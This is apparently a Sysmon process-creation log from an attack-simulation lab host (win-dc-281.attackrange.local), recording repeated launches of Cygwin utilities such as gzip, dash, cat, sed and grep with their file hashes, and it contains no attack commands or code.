14:55:55.714{A8622C2F-53FB-6078-3409-00000000AE01}5396C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-3209-00000000AE01}5828C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048966Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.714{A8622C2F-53FB-6078-3309-00000000AE01}5620C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048954Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.707{A8622C2F-53FB-6078-3209-00000000AE01}5828C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048941Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.699{A8622C2F-53FB-6078-3109-00000000AE01}1140C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-3009-00000000AE01}4300C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.692{A8622C2F-53FB-6078-3009-00000000AE01}4300C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048919Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.684{A8622C2F-53FB-6078-2F09-00000000AE01}4424C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-2D09-00000000AE01}4364C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048901Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.677{A8622C2F-53FB-6078-2E09-00000000AE01}4568C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-2C09-00000000AE01}6364C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048899Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.676{A8622C2F-53FB-6078-2D09-00000000AE01}4364C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048880Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.669{A8622C2F-53FB-6078-2C09-00000000AE01}6364C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048878Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.669{A8622C2F-53FB-6078-2B09-00000000AE01}5664C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-2A09-00000000AE01}4384C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048866Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.662{A8622C2F-53FB-6078-2A09-00000000AE01}4384C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048854Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.654{A8622C2F-53FB-6078-2909-00000000AE01}6968C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-2809-00000000AE01}6448C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048844Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.646{A8622C2F-53FB-6078-2809-00000000AE01}6448C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048831Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.638{A8622C2F-53FB-6078-2709-00000000AE01}4160C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-2509-00000000AE01}616C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048814Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.630{A8622C2F-53FB-6078-2609-00000000AE01}3368C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-2309-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048811Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.630{A8622C2F-53FB-6078-2509-00000000AE01}616C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048792Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.623{A8622C2F-53FB-6078-2409-00000000AE01}6336C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-2209-00000000AE01}5404C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048791Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.623{A8622C2F-53FB-6078-2309-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048779Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.616{A8622C2F-53FB-6078-2209-00000000AE01}5404C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048766Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.607{A8622C2F-53FB-6078-2109-00000000AE01}6672C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-2009-00000000AE01}7140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048756Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.600{A8622C2F-53FB-6078-2009-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048744Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.592{A8622C2F-53FB-6078-1F09-00000000AE01}5828C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-1D09-00000000AE01}5052C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048726Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.585{A8622C2F-53FB-6078-1E09-00000000AE01}1140C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-1B09-00000000AE01}4300C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048724Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.584{A8622C2F-53FB-6078-1D09-00000000AE01}5052C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048706Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.577{A8622C2F-53FB-6078-1C09-00000000AE01}5108C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-1A09-00000000AE01}1408C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048704Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.577{A8622C2F-53FB-6078-1B09-00000000AE01}4300C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048692Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.570{A8622C2F-53FB-6078-1A09-00000000AE01}1408C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048680Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.562{A8622C2F-53FB-6078-1909-00000000AE01}3176C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-1809-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048670Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.555{A8622C2F-53FB-6078-1809-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048658Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.547{A8622C2F-53FB-6078-1709-00000000AE01}5640C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-1509-00000000AE01}5996C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048639Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.540{A8622C2F-53FB-6078-1609-00000000AE01}6084C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-1309-00000000AE01}6196C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048637Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.539{A8622C2F-53FB-6078-1509-00000000AE01}5996C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048619Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.532{A8622C2F-53FB-6078-1409-00000000AE01}6592C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-1209-00000000AE01}6852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048617Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.532{A8622C2F-53FB-6078-1309-00000000AE01}6196C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048605Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.524{A8622C2F-53FB-6078-1209-00000000AE01}6852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048593Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.516{A8622C2F-53FB-6078-1109-00000000AE01}4056C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-1009-00000000AE01}1476C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048583Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.509{A8622C2F-53FB-6078-1009-00000000AE01}1476C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048570Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.501{A8622C2F-53FB-6078-0F09-00000000AE01}1612C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-0D09-00000000AE01}1156C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048552Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.493{A8622C2F-53FB-6078-0E09-00000000AE01}4832C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-0B09-00000000AE01}3912C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048550Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.493{A8622C2F-53FB-6078-0D09-00000000AE01}1156C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048531Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.486{A8622C2F-53FB-6078-0C09-00000000AE01}2408C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-0A09-00000000AE01}5220C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048530Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.486{A8622C2F-53FB-6078-0B09-00000000AE01}3912C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048518Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 